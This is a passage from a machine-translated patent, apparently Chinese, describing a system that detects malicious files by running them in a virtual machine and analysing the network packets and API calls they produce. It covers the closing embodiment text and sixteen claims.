Optionally, above-mentioned storage medium is also configured to the program code that storage is used to perform following steps：According to single Whether preset kind parameter is included to judge whether file to be detected is particular type file in network flow data bag；According to phase Whether meet preset rules between multiple network flow data bags of mutual correlation to judge whether file to be detected is particular type File.

Optionally, above-mentioned storage medium is also configured to the program code that storage is used to perform following steps：When single net When including preset kind parameter in network data on flows bag, judge file to be detected for particular type file；When single network flow When not including preset kind parameter in packet, it is not particular type file to judge file to be detected.

Optionally, above-mentioned storage medium is also configured to the program code that storage is used to perform following steps：Closed when mutual Meet preset rules between multiple network flow data bags of connection, judge file to be detected for particular type file；Closed when mutual Preset rules are not met between multiple network flow data bags of connection, it is not particular type file to judge file to be detected.

Optionally, above-mentioned storage medium is also configured to the program code that storage is used to perform following steps：Obtain to be checked Survey application programming interface (API) function called during operation of the file in virtualized environment；To api function and with Parameter list is tested and analyzed corresponding to api function, judges whether file to be detected is particular type file.

Above-mentioned the embodiment of the present application sequence number is for illustration only, does not represent the quality of embodiment.

In above-described embodiment of the application, the description to each embodiment all emphasizes particularly on different fields, and does not have in some embodiment The part of detailed description, it may refer to the associated description of other embodiment.

In several embodiments provided herein, it should be understood that disclosed technology contents, others can be passed through Mode is realized.Wherein, device embodiment described above is only schematical, such as the division of the unit, is only A kind of division of logic function, can there is an other dividing mode when actually realizing, for example, multiple units or component can combine or Person is desirably integrated into another system, or some features can be ignored, or does not perform.Another, shown or discussed is mutual Between coupling or direct-coupling or communication connection can be INDIRECT COUPLING or communication link by some interfaces, unit or module Connect, can be electrical or other forms.

The unit illustrated as separating component can be or may not be physically separate, show as unit The part shown can be or may not be physical location, you can with positioned at a place, or can also be distributed to multiple On NE.Some or all of unit therein can be selected to realize the mesh of this embodiment scheme according to the actual needs 's.

In addition, each functional unit in each embodiment of the application can be integrated in a processing unit, can also That unit is individually physically present, can also two or more units it is integrated in a unit.Above-mentioned integrated list Member can both be realized in the form of hardware, can also be realized in the form of SFU software functional unit.

If the integrated unit is realized in the form of SFU software functional unit and is used as independent production marketing or use When, it can be stored in a computer read/write memory medium.Based on such understanding, the technical scheme of the application is substantially The part to be contributed in other words to prior art or all or part of the technical scheme can be in the form of software products Embody, the computer software product is stored in a storage medium, including some instructions are causing a computer Equipment (can be personal computer, server or network equipment etc.) perform each embodiment methods described of the application whole or Part steps.And foregoing storage medium includes：USB flash disk, read-only storage (ROM, Read-Only Memory), arbitrary access are deposited Reservoir (RAM, Random Access Memory), mobile hard disk, magnetic disc or CD etc. are various can be with store program codes Medium.

Described above is only the preferred embodiment of the application, it is noted that for the ordinary skill people of the art For member, on the premise of the application principle is not departed from, some improvements and modifications can also be made, these improvements and modifications also should It is considered as the protection domain of the application.

Claims

A kind of 1. system for analyzing network data, it is characterised in that including：Virtualized environment and instruction set simulation environment；

The virtualized environment, for caused network flow data during operation of the file to be detected in virtualized environment Bag is tested and analyzed, and judges whether the file to be detected is particular type file；

The instruction set simulation environment, for calling during operation of the file to be detected in the virtualized environment Application programming interface api function and parameter list corresponding with the api function are tested and analyzed, and are judged described to be checked Survey whether file is the particular type file.
2. system according to claim 1, it is characterised in that the virtualized environment is virtual machine.
3. system according to claim 1, it is characterised in that the instruction set simulation environment is based on the virtual of simulator Machine software.
A kind of 4. method for analyzing network data, it is characterised in that including：

Caused network flow data bag during obtaining operation of the file to be detected in virtualized environment；

The network flow data bag is tested and analyzed, judges whether the file to be detected is particular type file.
5. according to the method for claim 4, it is characterised in that the network flow data bag is tested and analyzed, sentenced Whether the file to be detected that breaks is that the particular type file includes：

Whether preset kind parameter is included to judge whether the file to be detected is institute according in single network data on flows bag State particular type file.
6. according to the method for claim 4, it is characterised in that the network flow data bag is tested and analyzed, sentenced Whether the file to be detected that breaks is that the particular type file includes：

Whether meet preset rules according to being mutually related between multiple network flow data bags to judge the file to be detected Whether it is the particular type file.
7. according to the method for claim 5, it is characterised in that whether included according in the single network data on flows bag Preset kind parameter judges whether the file to be detected is that the particular type file includes one below：

When including the preset kind parameter in the single network data on flows bag, judge that the file to be detected is described Particular type file；

When not including the preset kind parameter in the single network data on flows bag, judge that the file to be detected is not The particular type file.
8. according to the method for claim 6, it is characterised in that according to multiple network flow data bags that are mutually related Between whether meet the preset rules judge the file to be detected whether be the particular type file include it is following it One：

When meeting the preset rules between multiple network flow data bags that are mutually related, the file to be detected is judged For the particular type file；

When not meeting the preset rules between multiple network flow data bags that are mutually related, the text to be detected is judged Part is not the particular type file.
9. according to the method for claim 4, it is characterised in that methods described also includes：

Obtain the application programming interface API letters called during operation of the file to be detected in the virtualized environment Number and parameter list corresponding with the api function；

The api function and parameter list corresponding with the api function are tested and analyzed, judge the file to be detected Whether it is the particular type file.
10. the method according to any one of claim 4 to 9, it is characterised in that the virtualized environment is applied to virtual Machine.
11. the method according to any one of claim 4 to 9, it is characterised in that the particular type file is malice text Part.
A kind of 12. device for analyzing network data, it is characterised in that including：

First acquisition module, for caused network flow data during obtaining operation of the file to be detected in virtualized environment Bag；

First analysis module, for being tested and analyzed to the network flow data bag, whether judge the file to be detected For particular type file.
13. device according to claim 12, it is characterised in that first analysis module, for according to single network Whether preset kind parameter is included to judge whether the file to be detected is the particular type file in data on flows bag；Or Person, whether meet preset rules according to being mutually related between multiple network flow data bags to judge that the file to be detected is No is the particular type file.
14. device according to claim 13, it is characterised in that first analysis module, for when the single net When the preset kind parameter is included in network data on flows bag, judge that the file to be detected is the particular type file；Or Person, when not including the preset kind parameter in the single network data on flows bag, judge that the file to be detected is not The particular type file.
15. device according to claim 13, it is characterised in that first analysis module, for mutually being closed when described Meet the preset rules between multiple network flow data bags of connection, judge the file to be detected for particular type text Part；Or when not meeting the preset rules between multiple network flow data bags that are mutually related, judge described to be checked It is not the particular type file to survey file.
16. device according to claim 12, it is characterised in that described device also includes：

Second acquisition module, for the application called during obtaining operation of the file to be detected in the virtualized environment Program Interfaces api function and parameter list corresponding with the api function；

Second analysis module, for being tested and analyzed to the api function and parameter list corresponding with the api function, Judge whether the file to be detected is the particular type file.